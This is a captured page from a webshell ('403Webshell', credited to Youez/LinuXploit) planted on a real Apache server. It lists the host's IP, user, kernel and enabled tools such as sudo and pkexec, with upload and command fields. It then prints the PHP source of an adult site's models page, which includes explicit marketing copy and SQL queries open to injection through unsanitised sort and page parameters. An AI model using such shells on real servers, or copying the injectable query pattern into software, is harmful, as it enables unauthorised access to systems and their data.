403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/glamourdollars.com/vip-area/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/glamourdollars.com/vip-area/models.php
<?
include('config.php');
dbconn();

$seo_description = "The hottest porn models on the net in hot videos and sexy photosets.  See such hot porn models as Malena Morgan, Ryan Ryans, Brett Rossi, Madison Ivy, Mia Malkova, Nicole Aniston and Ariana Marie. Only the hottest young nude models.";
$seo_keywords = "porn models, hot girls, hot sexy models, naked girls, young nude models, nude porn stars";
$seo_title = "Porn Models and Hot Sexy Nudes at VIParea";
$seo_imagekeyword = "nude";

$update_type = "updatemodel";
include('mod_html_top.php');

$page_limit = "15";
if(isset($_GET['page'])) {
	$page = $_GET['page'];
	$limit_start = ($page_limit * $page) - $page_limit;
} else {
	$page = 1;
	$limit_start = 0;
}

if(isset($_GET['sort_by'])) {
	$sort_by = addslashes($_GET['sort_by']); // name=model name, rate=rating, releasedate=releasedate
	$sort_order = addslashes($_GET['sort_order']); // ASC - DESC
} else {
	$sort_by  = "releasedate";
	$sort_order = "DESC";
}
?>

<table width="1000" height="100" border="0" cellspacing="0" cellpadding="10" align="center" background="images/section_bg_right.jpg" id="page-header">
  <tr>
    <td width="150" align="center" background="images/section_bg_left.jpg"><span class="heading"><a href="models.php" alt="porn models" class="whitetxt">MODELS</a></span></td>
    <td class="whitetxt"><h1>VIP has the most popular porn models in hot sexy high quality photosets.</h1> VIP Models are among the elite of their industry. Pretty girls are a dime a dozen, but breathtaking models that exude sexuality from every pore are a little harder to find. Starting with the cream of the crop, we take our models to the next level and deliver content that is everything from glamorous, provocative to outright lascivious.  You may recognize some of our models names, but you will be blown away with how we turn them out.  Keep in mind that you are not entering your run of the mill website, this is the VIP Area.</td>
  </tr>
</table>
<br/><a href="/eva-lovia"><img src="images/model-header.jpg" width="998" border="0" id="page-banner" /></a><br/>

<table border="0" cellspacing="10" cellpadding="0">
  <tr>
  <td><div align="right" class="heading">Quick Sort</div></td>    
      <?
  if($sort_by == "name") {
		echo "<td><span class=\"contentname\">alphabetical</span></td><td width=\"1\">-</td>";
	} else {
		echo "<td><a href=\"models.php?sort_by=name&sort_order=ASC\">alphabetical</a></td><td width=\"1\">-</td>";
	}

  if($sort_by == "rate") {
		echo "<td><span class=\"contentname\">top rated</span></td><td width=\"1\"></td>";
	} else {
		echo "<td><a href=\"models.php?sort_by=rate&sort_order=DESC\">top rated</a></td><td width=\"1\"></td>";
	}
	
  if($sort_by == "releasedate") {
		echo "<td><span class=\"contentname\">recent</span></td>";
	} else {
		echo "<td><a href=\"models.php?sort_by=releasedate&sort_order=DESC\">recent</a></td>";
	}
	
	?>
  
  </tr>
</table>
<?

$get_total = @mysql_query("SELECT `cms_models`.`model_id`
FROM `cms_models`
INNER JOIN `cms_tags` ON `cms_tags`.`content_id` = `cms_models`.`model_id`
WHERE `cms_models`.`releasedate` <= '".$today."'
GROUP BY `cms_models`.`model_id`");
$total_rows = @mysql_num_rows($get_total);

$total_pages = ceil($total_rows / $page_limit);

if ($total_pages > 1) {
$pagination = pagination("models.php?sort_by=".$sort_by."&sort_order=".$sort_order."",$page,$total_pages);
} else {
$pagination = "";
}


$query = "SELECT `cms_models`.`model_id`,
`cms_models`.`releasedate`,
`cms_models`.`model_id`,
`cms_models`.`name`,
LEFT(`cms_models`.`name`,1) as model_letter,
`cms_models`.`total_videos`,
`cms_models`.`total_photos`,
(`cms_models`.`rate_total`/`cms_models`.`rate_count`) as rate
FROM `cms_models`
INNER JOIN `cms_tags` ON `cms_tags`.`content_id` = `cms_models`.`model_id`
WHERE `cms_models`.`releasedate` <= '".$today."' ".$sort."
GROUP BY `cms_models`.`model_id` 
ORDER BY ".$sort_by." ".$sort_order."
LIMIT ".$limit_start.",".$page_limit."";


$num_columns = "5";
$section = "models";
include('mod_model_output.php');

?>



<?
include('mod_html_bottom.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit